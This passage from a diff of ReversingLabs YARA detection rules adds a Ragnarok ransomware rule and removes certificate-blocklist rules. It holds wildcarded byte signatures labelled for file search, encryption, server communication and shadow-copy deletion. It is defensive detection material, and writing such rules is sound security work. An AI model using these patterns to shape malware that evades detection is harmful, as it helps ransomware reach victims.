?? ?? ?? A1 ?? ?? ?? ?? 8B 08 83 C4 ?? 68 ?? ?? + ?? ?? 8D 95 ?? ?? ?? ?? 52 51 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 + } + $file_search_4_1b_2 = { + E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? + ?? 50 FF 15 ?? ?? ?? ?? 8B F0 FF 15 ?? ?? ?? ?? 56 8B F8 FF 15 ?? ?? ?? ?? 83 FF ?? + 0F 85 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 8B 48 ?? 8D 95 ?? ?? ?? ?? 52 + 51 8D 95 ?? ?? ?? ?? 52 BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 8B 3D ?? ?? + ?? ?? 8B 1D + } + $file_search_4_1b_3 = { + E8 ?? ?? ?? ?? 83 C4 ?? 8D 4D ?? 51 8D 55 ?? 52 6A ?? 6A ?? 6A ?? 6A ?? B8 ?? ?? ?? + ?? 6A ?? 66 89 45 ?? 89 45 ?? 6A ?? 8D 85 ?? ?? ?? ?? 50 6A ?? C7 45 ?? ?? ?? ?? ?? + FF D3 85 C0 74 ?? E8 ?? ?? ?? ?? B8 ?? ?? ?? ?? 5F 5E 5B 8B E5 5D C3 + } + $server_communication_4_1b_1 = { + 55 8B EC 83 E4 ?? B8 ?? ?? ?? ?? E8 + } + $server_communication_4_1b_2 = { + E8 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? 8B 42 ?? 83 C4 ?? ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? + 89 44 24 ?? 3B C3 75 ?? ?? ?? B8 ?? ?? ?? ?? ?? 8B E5 5D C2 ?? ?? 68 ?? ?? ?? ?? 8D + ?? 24 ?? ?? ?? ?? 53 51 E8 ?? ?? ?? ?? 0F B6 ?? ?? ?? ?? ?? 0F B6 ?? ?? ?? ?? ?? 0F + B6 ?? ?? ?? ?? ?? 83 C4 0C + } + $server_communication_4_1b_3 = { + 8A 08 ?? ?? ?? 75 ?? 2B C6 50 57 8D ?? 24 ?? E8 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 + 8B CF 51 C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 + 44 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 83 C4 ?? 8D 78 ?? 8A 08 40 + 3A CB 75 ?? 2B C7 8B C8 8D 51 ?? 83 E2 ?? B8 ?? ?? ?? ?? 2B C2 50 50 8D 7C 01 ?? 8D + 84 0C ?? ?? ?? ?? 50 E8 + } + $server_communication_4_1b_4 = { + FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 84 24 ?? ?? ?? ?? 3B C3 76 ?? 8B 94 24 + ?? ?? ?? ?? 50 52 8D 84 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B + 84 24 ?? ?? ?? ?? 3B C3 76 ?? 8B 8C 24 ?? ?? ?? ?? 50 51 8D 94 24 ?? ?? ?? ?? 68 ?? + ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 8B 4C 24 ?? 53 53 6A ?? 53 53 6A ?? 8D 84 24 ?? + ?? ?? ?? 50 51 FF 15 ?? ?? ?? ?? 8B F0 89 74 24 ?? 3B F3 0F 84 ?? ?? ?? ?? 6A ?? 8D + 54 24 ?? 52 6A ?? 56 C7 44 24 ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B 48 + ?? 8B 40 ?? 53 68 ?? ?? ?? ?? 51 53 53 8D 94 24 ?? ?? ?? ?? 52 50 56 FF 15 + } + $server_communication_4_1b_5 = { + FF 15 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? 8D 44 24 ?? 50 68 ?? ?? ?? ?? 8D 8C + 24 ?? ?? ?? ?? 51 56 FF 15 ?? ?? ?? ?? 8B 44 24 ?? 8B 15 ?? ?? ?? ?? 88 9C 04 ?? ?? + ?? ?? 88 9C 04 ?? ?? ?? ?? 8B 42 ?? 50 8D 84 24 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 + ?? 85 C0 75 ?? 56 8B 35 ?? ?? ?? ?? FF D6 8B 4C 24 ?? 51 FF D6 8B 7C 24 ?? 47 89 7C + 24 ?? 83 FF ?? 0F 8C ?? ?? ?? ?? 8B 54 24 ?? 52 FF 15 ?? ?? ?? ?? 6A ?? FF 15 + } + $file_search_4_2_1 = { + E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 50 6A ?? 6A ?? 6A ?? 6A ?? FF 15 ?? ?? ?? + ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 A1 ?? ?? ?? ?? FF 30 FF 15 ?? ?? ?? ?? 68 ?? + ?? ?? ?? FF 15 ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 A1 ?? ?? ?? ?? + FF 70 ?? 8D 85 ?? ?? ?? ?? 50 FF D3 83 C4 ?? 8D 85 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 6A + ?? 6A ?? 68 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B F0 FF 15 ?? ?? ?? ?? 56 8B F8 FF 15 + } + $file_search_4_2_2 = { + FF D3 8B 35 ?? ?? ?? ?? 83 C4 ?? 8B 3D ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? 6A ?? 8D 85 ?? + ?? ?? ?? 50 68 ?? ?? ?? ?? FF D6 6A ?? 8D 85 ?? ?? ?? ?? 50 FF D7 6A ?? 8D 45 ?? 6A + ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? C7 45 ?? ?? ?? ?? ?? B8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? + 66 89 45 ?? 89 45 ?? 8D 45 ?? 50 8D 45 ?? 50 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 51 + 6A ?? FF D3 + } + $server_communication_4_2_1 = { + FF 15 ?? ?? ?? ?? 8B F0 0F 57 C0 8D 84 24 ?? ?? ?? ?? 66 0F 7F 84 24 ?? ?? ?? ?? 50 + 8D 84 24 ?? ?? ?? ?? 8B D6 50 68 ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? + 8B CE E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 56 A3 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? + 56 FF 15 + } + $server_communication_4_2_2 = { + FF D7 8B 0D ?? ?? ?? ?? 8B D0 8B 49 ?? E8 ?? ?? ?? ?? 83 C4 ?? C7 44 24 ?? ?? ?? ?? + ?? 8D 84 24 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? + ?? ?? ?? ?? 50 8D 84 24 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 84 24 ?? ?? ?? ?? + 50 FF D7 + } + $server_communication_4_2_3 = { + 6A ?? 8D 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? 50 6A ?? 56 FF 54 24 ?? 8B 0D ?? ?? ?? ?? + 6A ?? 68 ?? ?? ?? ?? 8D 41 ?? 50 6A ?? 68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 FF 71 + ?? 56 FF 54 24 + } + $server_communication_4_2_4 = { + FF 54 24 ?? 8B 44 24 ?? 66 C7 84 04 ?? ?? ?? ?? ?? ?? A1 ?? ?? ?? ?? FF 70 ?? 8D 84 + 24 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 57 8B 7C 24 ?? FF D7 56 FF + D7 + } + $server_communication_4_2_5 = { + 57 8B 7C 24 ?? FF D7 56 FF D7 FF 74 24 ?? FF D7 FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? + 6A ?? FF 15 + } + $server_communication_3_1 = { + 8A 08 40 3A CB 75 ?? 2B C7 50 8D 94 24 ?? ?? ?? ?? 8B CE E8 ?? ?? ?? ?? 83 C4 ?? 8D + 44 24 ?? 50 8D 8C 24 ?? ?? ?? ?? 51 C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C7 84 24 ?? ?? + ?? ?? ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? + E8 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 83 C4 ?? 8D ?? ?? EB + } + $server_communication_3_2 = { + 68 ?? ?? ?? ?? 88 9C 04 ?? ?? ?? ?? 51 88 9C 04 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 83 C4 + ?? 85 C0 75 ?? 57 8B 3D ?? ?? ?? ?? FF D7 56 FF D7 8B 7C 24 ?? 83 C7 ?? 89 7C 24 ?? + 81 FF ?? ?? ?? ?? 0F 8C ?? ?? ?? ?? 8B 54 24 ?? 52 FF 15 ?? ?? ?? ?? 39 1D ?? ?? ?? + ?? 75 ?? 8B 44 24 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? FF 15 + } + $file_search_3_1 = { + 55 8B EC B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? [0-1] 56 57 33 C0 + 68 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? 51 66 89 85 ?? ?? ?? ?? E8 + } + $file_search_3_1_1 = { + FF 15 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 EB ?? + FF 15 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 52 BA ?? ?? ?? + ?? E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? + ?? ?? 50 FF 15 ?? ?? ?? ?? 8B F0 FF 15 ?? ?? ?? ?? 56 8B F8 FF 15 + } + $file_search_3_1_2 = { + 8B 35 ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? 83 C4 ?? 6A ?? 8D 85 ?? ?? ?? + ?? 50 68 ?? ?? ?? ?? FF D6 6A ?? 8D 8D ?? ?? ?? ?? 51 FF D7 6A ?? 8D 95 ?? ?? ?? ?? + 6A ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ?? 51 8D 95 ?? ?? ?? ?? 52 6A ?? 6A + ?? 6A ?? 6A ?? B8 ?? ?? ?? ?? 6A ?? 66 89 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 6A ?? 8D + 85 ?? ?? ?? ?? 50 6A ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? FF D3 85 C0 74 ?? E8 + } + $file_search_3_2_1 = { + 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? + 50 BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? + ?? 8D 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 8B F0 FF 15 ?? ?? ?? ?? 56 8B F8 FF 15 ?? + ?? ?? ?? 83 FF ?? 0F 85 + } + $file_search_3_2_2 = { + 8B 35 ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? 83 C4 ?? 6A ?? 8D 8D ?? ?? ?? ?? 51 68 ?? ?? ?? + ?? FF D6 6A ?? 8D 95 ?? ?? ?? ?? 6A ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ?? + 51 8D 95 ?? ?? ?? ?? 52 6A ?? 6A ?? 6A ?? 6A ?? B8 ?? ?? ?? ?? 6A ?? 66 89 85 ?? ?? + ?? ?? 89 85 ?? ?? ?? ?? 6A ?? 8D 85 ?? ?? ?? ?? 50 6A ?? C7 85 ?? ?? ?? ?? ?? ?? ?? + ?? FF D7 85 C0 74 ?? E8 + } + $search_and_encrypt_3_1 = { + 8B C3 83 C4 ?? 8D 50 ?? [1-3] 66 8B 08 83 C0 ?? 66 85 C9 75 ?? 2B C2 D1 F8 83 F8 ?? 76 + ?? 68 ?? ?? ?? ?? 8D ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D ?? + ?? ?? ?? ?? ?? 8D ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? + ?? ?? ?? B8 ?? ?? ?? ?? 66 8B 10 66 3B 11 75 ?? 66 85 D2 74 ?? 66 8B 50 ?? 66 3B 51 + ?? 75 ?? 83 C0 ?? 83 C1 ?? 66 85 D2 75 ?? 33 C0 EB + } + $search_and_encrypt_3_2 = { + 1B C0 83 D8 ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? B8 ?? ?? ?? ?? 66 8B 10 66 + 3B 11 75 ?? 66 85 D2 74 ?? 66 8B 50 ?? 66 3B 51 ?? 75 ?? 83 C0 ?? 83 C1 ?? 66 85 D2 + 75 ?? 33 C0 EB ?? 1B C0 83 D8 ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? B8 ?? ?? + ?? ?? 90 66 8B 10 66 3B 11 75 ?? 66 85 D2 74 ?? 66 8B 50 ?? 66 3B 51 ?? 75 ?? 83 C0 + ?? 83 C1 ?? 66 85 D2 75 ?? 33 C0 + } + $search_and_encrypt_3_3 = { + 1B C0 83 D8 ?? 85 C0 0F 84 ?? ?? ?? ?? 8B ?? ?? ?? 8D ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? + ?? 8D ?? ?? ?? ?? ?? ?? 8D ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? + 8D ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 83 7D ?? ?? 0F 85 ?? ?? ?? ?? 53 + 8D ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 8D ?? ?? + ?? ?? ?? 68 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D ?? ?? ?? ?? ?? ?? 8D ?? ?? ?? + ?? ?? 68 ?? ?? ?? ?? ?? E8 + } + $search_and_encrypt_3_4 = { + E8 ?? ?? ?? ?? 83 C4 ?? 8B F0 57 56 E8 ?? ?? ?? ?? 83 C4 ?? B8 ?? ?? ?? ?? 8B CE E8 + ?? ?? ?? ?? 85 C0 75 ?? B8 ?? ?? ?? ?? 8B CE E8 ?? ?? ?? ?? 85 C0 75 ?? 8B C6 E8 ?? + ?? ?? ?? 83 F8 ?? 75 ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 56 E8 + } condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Carmel group LLC" and pe.signatures[i].serial=="13:79:43:71:c0:52:ec:05:59:e9:b4:92:ab:b2:5c:26" and 1599177600<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and (($file_search_0_3_1_1 and $file_search_0_3_1_2 and $encrypt_file_0_2_6a_1 and $encrypt_file_0_2_6a_2 and $server_communication_0_2_6a_1 and $server_communication_0_2_6a_2) or ($file_search_0_3_1_1 and $file_search_0_3_1_2 and $encrypt_file_0_3_1 and $server_communication_0_3_1_1 and $server_communication_0_3_1_2) or ($file_search_0_3_3_1 and $file_search_0_3_3_2 and $encrypt_file_0_3_3_1 and $encrypt_file_0_3_3_2 and $server_communication_0_3_3_1 and $server_communication_0_3_3_2) or ($file_search_0_3_4a_1 and $file_search_0_3_4a_2 and $encrypt_file_0_3_4a_1 and $encrypt_file_0_3_4a_2 and $server_communication_0_3_4a_1 and $server_communication_0_3_4a_2) or ($file_search_0_3_5a_1 and $file_search_0_3_5a_2 and $encrypt_file_0_3_5a_1 and $encrypt_file_0_3_5a_2 and $server_communication_0_3_5a_1 and $server_communication_0_3_5a_2) or ($server_communication_2_0_4e and $search_and_encrypt_2_0_4e_1 and $search_and_encrypt_2_0_4e_2 and $search_and_encrypt_2_0_4e_3 and $search_and_encrypt_2_0_4e_4 and $search_and_encrypt_2_0_4e_5) or ($server_communication_4_0_1 and $server_communication_4_0_2 and $server_communication_4_0_3 and $file_search_4_0_1 and $file_search_4_0_2 and $file_search_4_0_3) or ($file_search_4_1b_1 and $file_search_4_1b_2 and $file_search_4_1b_3 and $server_communication_4_1b_1 and $server_communication_4_1b_2 and $server_communication_4_1b_3 and $server_communication_4_1b_4 and $server_communication_4_1b_5) or ($file_search_4_2_1 and $file_search_4_2_2 and $server_communication_4_1b_1 and $server_communication_4_2_1 and $server_communication_4_2_2 and $server_communication_4_2_3 and $server_communication_4_2_4 and $server_communication_4_2_5) or ($server_communication_4_0_1 and $server_communication_3_1 and $server_communication_3_2 and $file_search_3_1 and $file_search_3_1_1 and $file_search_3_1_2 and $search_and_encrypt_3_1 and $search_and_encrypt_3_2 and $search_and_encrypt_3_3 and $search_and_encrypt_3_4) or ($server_communication_4_0_1 and $server_communication_3_1 and $server_communication_3_2 and $file_search_3_1 and $file_search_3_2_1 and $file_search_3_2_2 and $search_and_encrypt_3_1 and $search_and_encrypt_3_2 and $search_and_encrypt_3_3 and $search_and_encrypt_3_4)) } -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_5C7E78F53C31D6Aa5B45De14B47Eb5C4 : INFO FILE +rule REVERSINGLABS_Win32_Ransomware_Ragnarok : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "Certificate used for digitally signing malware." + description = "Yara rule that detects Ragnarok ransomware." author = "ReversingLabs" - id = "5906107a-03ce-5ca4-b0a7-12b0b45359dd" - date = "2023-11-08" - modified = "2023-11-08" + id = "263a671e-dfdb-5ab8-9bb9-355c76a88c10" + date = "2020-07-15" + modified = "2020-07-15" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L5100-L5116" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "7521abc5c93f0336af4fab95268962aa3d3fb48fed6a8ba7fdb98e373158b327" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/ransomware/Win32.Ransomware.Ragnarok.yara#L1-L110" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "aaa17ab98b59a5c8c71a2b82a9bf29dd3a1a1719deaf08a3bafa77895bc10311" score = 75 quality = 90 - tags = "INFO, FILE" + tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "INFO" + category = "MALWARE" + tc_detection_type = "Ransomware" + tc_detection_name = "Ragnarok" + tc_detection_factor = 5 importance = 25 - condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Cubic Information Systems, UAB" and pe.signatures[i].serial=="5c:7e:78:f5:3c:31:d6:aa:5b:45:de:14:b4:7e:b5:c4" and 1579824000<=pe.signatures[i].not_after) -} -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_Dadf44E4046372313Ee97B8E394C4079 : INFO FILE -{ - meta: - description = "Certificate used for digitally signing malware." - author = "ReversingLabs" - id = "bebfbbd7-8d42-50a3-8efa-85b641eb069a" - date = "2023-11-08" - modified = "2023-11-08" - reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L5118-L5136" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "170533935b91776ec2413106c55ed4a01c33f32a469a855824cac796f2e132a0" - score = 75 - quality = 90 - tags = "INFO, FILE" - status = "RELEASED" - sharing = "TLP:WHITE" - category = "INFO" - importance = 25 + strings: + $find_files_p1 = { + 8B FF 55 8B EC 51 8B 4D ?? 8D 51 ?? 8A 01 41 84 C0 75 ?? 57 8B 7D ?? 2B CA 8B C7 41 + F7 D0 89 4D ?? 3B C8 76 ?? 6A ?? 58 5F 8B E5 5D C3 53 56 8D 5F ?? 03 D9 6A ?? 53 E8 + ?? ?? ?? ?? 8B F0 59 59 85 FF 74 ?? 57 FF 75 ?? 53 56 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 + 75 ?? FF 75 ?? 2B DF 8D 04 3E FF 75 ?? 53 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 8B + 5D ?? 8B CB E8 ?? ?? ?? ?? 33 FF 89 45 ?? 85 C0 74 ?? 56 E8 ?? ?? ?? ?? 8B 75 ?? 59 + EB ?? 8B 43 ?? 89 30 8B F7 83 43 ?? ?? 57 E8 ?? ?? ?? ?? 59 8B C6 5E 5B EB ?? 33 FF + 57 57 57 57 57 E8 ?? ?? ?? ?? CC 8B FF 55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 + C5 89 45 ?? 8B 4D ?? 8B 55 ?? 53 57 8B 7D ?? 89 95 ?? ?? ?? ?? 3B CF 74 ?? 8A 01 3C + ?? 74 ?? 3C ?? 74 ?? 3C ?? 74 ?? 51 57 E8 ?? ?? ?? ?? 59 59 8B C8 3B CF 75 ?? 8B 95 + ?? ?? ?? ?? 8A 01 88 85 ?? ?? ?? ?? 3C ?? 75 ?? 8D 47 ?? 3B C8 74 ?? 52 33 DB 53 53 + 57 E8 ?? ?? ?? ?? 83 C4 ?? E9 ?? ?? ?? ?? 8A 85 ?? ?? ?? ?? 33 DB 3C ?? 74 ?? 3C ?? + 74 ?? 3C ?? 8A C3 75 ?? B0 ?? 2B CF 0F B6 C0 41 89 9D ?? ?? ?? ?? F7 D8 89 9D ?? ?? + ?? ?? 56 1B C0 89 9D ?? ?? ?? ?? 23 C1 89 9D ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 89 9D ?? + ?? ?? ?? 88 9D ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 57 E8 + } + $find_files_p2 = { + 83 C4 ?? 8D 8D ?? ?? ?? ?? F7 D8 1B C0 53 53 53 51 F7 D0 23 85 ?? ?? ?? ?? 53 50 FF + 15 ?? ?? ?? ?? 8B F0 83 FE ?? 75 ?? FF B5 ?? ?? ?? ?? 53 53 57 E8 ?? ?? ?? ?? 83 C4 + ?? 8B D8 E9 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 48 ?? 2B 08 C1 F9 ?? 89 8D ?? ?? ?? ?? + 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 89 9D ?? ?? + ?? ?? 88 9D ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 + 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? F7 D8 1B C0 F7 D0 23 85 ?? ?? ?? ?? 80 + 38 ?? 75 ?? 8A 48 ?? 84 C9 74 ?? 80 F9 ?? 75 ?? 38 58 ?? 74 ?? FF B5 ?? ?? ?? ?? FF + B5 ?? ?? ?? ?? 57 50 E8 ?? ?? ?? ?? 83 C4 ?? 89 85 ?? ?? ?? ?? 85 C0 75 ?? 38 9D ?? + ?? ?? ?? 74 ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 8D 85 ?? ?? ?? ?? 50 56 FF 15 ?? + ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 8B 10 8B 40 ?? + 2B C2 C1 F8 ?? 3B C8 74 ?? 68 ?? ?? ?? ?? 2B C1 6A ?? 50 8D 04 8A 50 E8 ?? ?? ?? ?? + 83 C4 ?? EB ?? 38 9D ?? ?? ?? ?? 74 ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? + ?? ?? 59 8B D8 56 FF 15 ?? ?? ?? ?? 80 BD ?? ?? ?? ?? ?? 5E 74 ?? FF B5 ?? ?? ?? ?? + E8 ?? ?? ?? ?? 59 8B C3 8B 4D ?? 5F 33 CD 5B E8 ?? ?? ?? ?? 8B E5 5D C3 + } + $encrypt_files_p1 = { + 55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 8B 45 ?? 8B 4D ?? 56 57 89 + 85 ?? ?? ?? ?? 33 FF 33 C0 89 8D ?? ?? ?? ?? 6A ?? 51 89 85 ?? ?? ?? ?? E8 ?? ?? ?? + ?? 83 C4 ?? 8D 70 ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 40 ?? 8A 0E + 3A 08 75 ?? 84 C9 74 ?? 8A 4E ?? 3A 48 ?? 75 ?? 83 C6 ?? 83 C0 ?? 84 C9 75 ?? 33 C0 + EB ?? 1B C0 83 C8 ?? 85 C0 0F 84 ?? ?? ?? ?? 53 6A ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B D8 + 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 F6 8B 40 ?? 8B F8 E8 ?? ?? ?? ?? + 33 D2 B9 ?? ?? ?? ?? F7 F1 8A 04 3A 88 04 1E 46 83 FE ?? 7C ?? FF B5 ?? ?? ?? ?? E8 + ?? ?? ?? ?? 83 C4 ?? 89 85 ?? ?? ?? ?? 33 C9 23 F9 89 8D ?? ?? ?? ?? 3D ?? ?? ?? ?? + 0F 87 ?? ?? ?? ?? 48 83 E0 ?? 83 C0 ?? 50 89 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? + ?? ?? FF B5 ?? ?? ?? ?? 8B F0 89 B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F8 83 C4 ?? 85 FF + } + $encrypt_files_p2 = { + 0F 84 ?? ?? ?? ?? 57 FF B5 ?? ?? ?? ?? 6A ?? 56 E8 ?? ?? ?? ?? 57 8B F0 E8 ?? ?? ?? + ?? 83 C4 ?? 33 FF 3B B5 ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 33 C0 3B 85 ?? ?? ?? ?? 0F 85 + ?? ?? ?? ?? 53 FF B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? FF B5 ?? ?? ?? + ?? 8B B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 56 50 E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF B5 ?? + ?? ?? ?? E8 ?? ?? ?? ?? 8B F8 83 C4 ?? 85 FF 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? + ?? ?? ?? 50 53 89 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 8B 85 ?? ?? ?? + ?? 57 68 ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 3D ?? ?? ?? ?? 75 ?? 57 6A ?? + 8D 85 ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 57 FF B5 ?? ?? ?? ?? 6A ?? 56 E8 ?? ?? ?? + ?? 83 C4 ?? 3B 85 ?? ?? ?? ?? 75 ?? 57 E8 ?? ?? ?? ?? 8B B5 ?? ?? ?? ?? 33 FF 56 E8 + ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? 8B 85 ?? ?? ?? ?? 85 C0 74 ?? 50 E8 ?? ?? ?? + ?? 83 C4 ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 8B 85 ?? ?? ?? ?? 5B 85 C0 74 ?? + 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 FF 74 ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? 8B 4D ?? 5F 33 CD + 5E E8 ?? ?? ?? ?? 8B E5 5D C3 + } + $disable_fw_and_delete_shadow_volumes = { + 6A ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 40 ?? 50 E8 ?? ?? ?? ?? 83 + C4 ?? 85 C0 74 ?? 8D 45 ?? 50 8D 85 ?? ?? ?? ?? 50 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A + ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 40 ?? 50 6A ?? FF D7 E9 